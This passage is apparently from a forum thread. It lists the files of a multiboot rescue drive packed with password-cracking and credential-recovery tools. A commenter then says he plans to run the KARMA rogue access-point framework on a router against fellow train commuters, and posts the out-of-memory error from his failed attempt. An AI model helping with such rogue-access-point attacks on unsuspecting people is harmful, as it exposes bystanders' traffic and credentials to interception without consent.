| | |-- memdisk | | |-- menu.c32 | | |-- ocswp.png | | |-- syslinux.cfg | | `-- vesamenu.c32 | `-- utils | |-- README.txt | |-- linux | | |-- VERSION.txt | | |-- makeboot.sh | | `-- syslinux | |-- mbr | | `-- mbr.bin | `-- win32 | |-- VERSION.txt | |-- makeboot.bat | `-- syslinux.exe |-- dban-floppy.img |-- dsl_root | |-- boot | | `-- isolinux | | |-- boot.cat | | |-- boot.msg | | |-- f2 | | |-- f3 | | |-- german.kbd | | |-- isolinux.bin | | |-- isolinux.cfg | | |-- linux24 | | |-- logo.16 | | `-- minirt24.gz | `-- index.html |-- freedos.img |-- grldr |-- grub-rescue-floppy.img |-- hirens_root | |-- Active.uha | |-- Astra.uha | |-- BiosBoot.uha | |-- DiskCmdr.uha | |-- Diskptch.uha | |-- DosBurn.uha | |-- DskMangr.uha | |-- ESTest.uha | |-- EasyRecv.uha | |-- FastLynx.uha | |-- Ghost.uha | |-- HDAT2.uha | |-- HDDReg.uha | |-- HWiNFO.uha | |-- HddErase.uha | |-- HddTools.uha | |-- Killdisk.uha | |-- LapLink5.uha | |-- Med_Tool.uha | |-- Mini98.uha | |-- MpxPlay.uha | |-- NTFS4DOS.uha | |-- Network.uha | |-- NtPwd.uha | |-- PCDoctor.uha | |-- PCI32.uha | |-- PCcheck.uha | |-- PTD.uha | |-- PartCmdr.uha | |-- PartMngr.uha | |-- PictView.uha | |-- QuickVie.uha | |-- ReHive.uha | |-- RegView.uha | |-- SavePart.uha | |-- SystemAn.uha | |-- TestDisk.uha | |-- Tools.uha | |-- VC.uha | |-- Vdefs | | `-- ReadME.txt | |-- Victoria.uha | |-- WinTools | | |-- 7Zip.bat | | |-- AsteriskLogger.bat | | |-- AutoRuns.bat | | |-- Autorun.csv | | |-- Autorun.exe | | |-- CCleaner.bat | | |-- CPUz.bat | | |-- CPorts.bat | | |-- ComboFix.exe | | |-- ContentAdvisorPasswordRemover.bat | | |-- CoolWebSearch_Remover.bat | | |-- DTemp.bat | | |-- DefragNT.exe | | |-- DialAFix.bat | | |-- DisableAutorun.bat | | |-- DisableCompressOldFiles.bat | | |-- DoubleDriver.bat | | |-- DriveImageXML.bat | | |-- DriverBackup.exe | | |-- DrvImgXp.bat | | |-- DskSpeed.bat | | |-- EASEUSPartitionMaster.bat | | |-- ERDExplorer.bat | | |-- ERDSystemRestore.bat | | |-- EditHosts.bat | | |-- ExpressBurn.bat | | |-- EzPCFix.bat | | |-- GetDataFAT.bat | | |-- GetDataNTFS.bat | | |-- Ghost32.bat | | |-- GhostExp.bat | | |-- HDDScan.bat | | |-- HDTune.bat | | |-- HijackThis.exe | | |-- IBProcMan.exe | | |-- JkDefrag.bat | | |-- KasperskyVirusRemoval.bat | | |-- KillBox.exe | | |-- MailPassView.bat | | |-- Malwarebytes.bat | | |-- MemTest.bat | | |-- MessenPass.bat | | |-- MonitorTester.bat | | |-- NewSID.bat | | |-- NtRegOpt.bat | | |-- Opera.bat | | |-- PCI32.bat | | |-- PCWizard.bat | | |-- PageDfrg.bat | | |-- PartSaving.bat | | |-- PartitionFindAndMount.bat | | |-- PasswordRenew.bat | | |-- ProceXP.exe | | |-- ProcessExplorer.bat | | |-- ProduKey.bat | | |-- Recuva.bat | | |-- RegEditPE.bat | | |-- RegistryRestoreWizard.bat | | |-- Restoration.bat | | |-- RootkitRevealer.bat | | |-- SM.bat | | |-- ShExView.bat | | |-- Shredder.exe | | |-- SilentRunners.bat | | |-- SmartDriverBackup.bat | | |-- SmitFraudFix.bat | | |-- SpaceMonger.bat | | |-- Splitter.exe | | |-- SpybotSD.bat | | |-- SpywareBlaster.bat | | |-- StartupCPL.bat | | |-- StartupMonitor.exe | | |-- SuperAntiSpyware.bat | | |-- TCPView.bat | | |-- TrueCrypt.bat | | |-- TweakUI.bat | | |-- UltimateWindowsTweaker.bat | | |-- Undelete.bat | | |-- UnknownDevices.bat | | |-- Unlocker.bat | | |-- UnstoppableCopier.bat | | |-- VideoMemoryStressTest.bat | | |-- VolkovCommander.bat | | |-- WinDirStat.bat | | |-- WinKeyFinder.exe | | |-- WindowsGate.bat | | |-- Winsock2Fix9x.bat | | |-- WirelessKeyView.bat | | |-- XP-Key-Reader.bat | | |-- XpTCPIPWinsockRepair.bat | | |-- files | | | |-- Autoruns.uha | | | |-- CCleaner.uha | | | |-- CpuZ.uha | | | |-- DialAFix.uha | | | |-- DriveImageXML.uha | | | |-- DrvImgXp.uha | | | |-- EPM.uha | | | |-- ERD.uha | | | |-- ExpressBurn.uha | | | |-- EzPCFix.uha | | | |-- Files.uha | | | |-- GetDataB.uha | | | |-- Ghost32.uha | | | |-- HDDScan.uha | | | |-- HDTune.uha | | | |-- JkDefrag.uha | | | |-- KasperskyVirusRemoval.uha | | | |-- Malwarebytes.uha | | | |-- NTREGOPT.uha | | | |-- Opera.uha | | | |-- PCwizard.uha | | | |-- PartFind.uha | | | |-- PasswordRenew.uha | | | |-- Recuva.uha | | | |-- RegEditPE.uha | | | |-- Restoration.uha | | | |-- RootkitRevealer.uha | | | |-- SRunners.uha | | | |-- SmartDriverBackup.uha | | | |-- SmitfraudFix.uha | | | |-- SpybotSD.uha | | | |-- SpywareBlaster.uha | | | |-- SuperAntiSpyware.uha | | | |-- TrueCrypt.uha | | | |-- TweakUI.uha | | | |-- UltimateWindowsTweaker.uha | | | |-- Undelete.uha | | | |-- Unlocker.uha | | | |-- VideoMemoryStressTest.uha | | | |-- WindirSt.uha | | | |-- WindowsGate.uha | | | |-- coolweb.uha | | | |-- sm.uha | | | `-- xp-AntiSpy.uha | | |-- siw.exe | | |-- snapshot.exe | | `-- xp-AntiSpy.bat | |-- adds.uha | |-- atis.uha | |-- boot.gz | |-- chntpw.uha | |-- copyr.uha | |-- dcc.uha | |-- dosnav.uha | |-- fm.uha | |-- fw.uha | |-- ghstwalk.uha | |-- isolinux.bin | |-- isolinux.cfg | |-- keyboard.bat | |-- lost_fnd.uha | |-- memdisk | |-- memtest.gz | |-- menu.c32 | |-- mix.uha | |-- nortUTIL.uha | |-- nssi.uha | |-- ntfs.uha | |-- pRESIZER.uha | |-- pcconfig.uha | |-- pmount.uha | |-- pqdi.uha | |-- pqpm.uha | |-- ts.uha | |-- uharc.exe | |-- uharcd.exe | |-- xp | |-- xp.bin | |-- xp.ca_ | |-- xp.dat | `-- xploader.bin |-- konboot-1.1.img |-- memdisk |-- memtest86+.bin |-- menu.lst |-- menu.lst.allworks |-- ntpasswd.img |-- ophcrack_root | |-- [BOOT] | | `-- Bootable_NoEmulation.img | `-- boot | |-- bzImage | |-- gpxe | |-- grub | | `-- example-menu.lst | |-- isolinux | | |-- be.cfg | | |-- be.kbd | | |-- boot.cat | | |-- br.cfg | | |-- br.kbd | | |-- ca.cfg | | |-- ca.kbd | | |-- common.cfg | | |-- common.inc | | |-- de.cfg | | |-- de.kbd | | |-- de_CH.cfg | | |-- de_CH.kbd | | |-- display.txt | | |-- en.cfg | | |-- en.kbd | | |-- enhelp.txt | | |-- enopts.txt | | |-- es.cfg | | |-- es.kbd | | |-- fi.cfg | | |-- fi.kbd | | |-- fr.cfg | | |-- fr.kbd | | |-- fr_CH.cfg | | |-- fr_CH.kbd | | |-- help.txt | | |-- hu.cfg | | |-- hu.kbd | | |-- ifmem.c32 | | |-- isolinux.bin | | |-- isolinux.cfg | | |-- isolinux.msg | | |-- it.cfg | | |-- it.kbd | | |-- jp.cfg | | |-- jp.kbd | | |-- options.txt | | |-- poweroff.com | | |-- pt.cfg | | |-- pt.kbd | | |-- reboot.c32 | | |-- ru.cfg | | |-- ru.kbd | | |-- splash.lss | | |-- us.cfg | | `-- us.kbd | |-- ophcrack.cfg | |-- rootfs.gz | |-- splash.png | |-- syslinux | | `-- syslinux.cfg | |-- vesamenu.c32 | `-- vmlinuz- |-- pmagic | |-- bzImage | |-- initramfs | `-- pmodules | |-- pmagic.sqfs | `-- scripts |-- pmagic_root | |-- boot | | `-- grub | | |-- e2fs_stage1_5 | | |-- fat_stage1_5 | | |-- grldr | | |-- grub4dos.lst | | |-- menu.lst | | |-- message.txt | | |-- message2.txt | | |-- message3.txt | | |-- ntfs_stage1_5 | | |-- stage1 | | `-- stage2 | `-- readme.txt |-- sbm.img |-- super_grub-root | |-- ldlinux.sys | |-- syslinux.cfg | |-- ubninit | |-- ubnkern | `-- vesamenu.c32 |-- super_grub_disk_floppy_0.9797.img |-- tables | |-- vista_free | | |-- md5sum.txt | | |-- postdict | | |-- table0.bin | | |-- table0.index | | |-- table0.start | | |-- table1.bin | | |-- table1.index | | |-- table1.start | | |-- table2.bin | | |-- table2.index | | |-- table2.start | | |-- table3.bin | | |-- table3.index | | |-- table3.start | | |-- vista_free.md5 | | |-- vista_free.sfv | | `-- worddict | `-- xp_free_small | |-- md5sum.txt | |-- table0.bin | |-- table0.index | |-- table0.start | |-- table1.bin | |-- table1.index | |-- table1.start | |-- table2.bin | |-- table2.index | |-- table2.start | |-- table3.bin | |-- table3.index | `-- table3.start `-- ubuntu904.iso 48 directories, 458 files
  14. Would it be possible to run the whole karma framework from a fon? And if so can you point me in the direction of the framework. I commute 1.5-2.5hrs each way to school on a moving target rich environment }: ) people call them trains i think. I don't have internet to offer for the "clients" so I'm really interested in doing this entirely on the fon. Plus my laptop can't stay on that long. : ( EDIT: nm found it : ) It's a package in the openwrt repo I think. EDIT: the package is not the framework : ( found a link to your tarball though. EDIT: karma framework on the fon is fail :_( Not enough ram it seems. root@OpenWrt:/karma# bin/karma etc/karma.xml Starting KARMA... Loading config file etc/karma.xml ACCESS-POINT is running AccessPoint: Card in AP mode sh: /usr/local/bin/wlanconfig: not found AccessPoint: IP address AccessPoint: Blacklist Mode /karma/modules/servers/AccessPoint/accesspoint.rb:105:in `popen': Cannot allocate memory - /usr/sbin/iwevent 2&gt;&amp;1 (Errno::ENOMEM) from /karma/modules/servers/AccessPoint/accesspoint.rb:105:in `run' from /karma/modules/servers/AccessPoint/accesspoint.rb:103:in `initialize' from /karma/modules/servers/AccessPoint/accesspoint.rb:103:in `new' from /karma/modules/servers/AccessPoint/accesspoint.rb:103:in `run' from ./bin/../modules/loader.rb:176:in `run' from ./bin/../modules/loader.rb:175:in `initialize' from ./bin/../modules/loader.rb:175:in `new' from ./bin/../modules/loader.rb:175:in `run' from bin/karma:49 from /usr/lib/ruby/1.8/rexml/element.rb:891:in `each' from /usr/lib/ruby/1.8/rexml/xpath.rb:53:in `each' from /usr/lib/ruby/1.8/rexml/element.rb:891:in `each' from bin/karma:46
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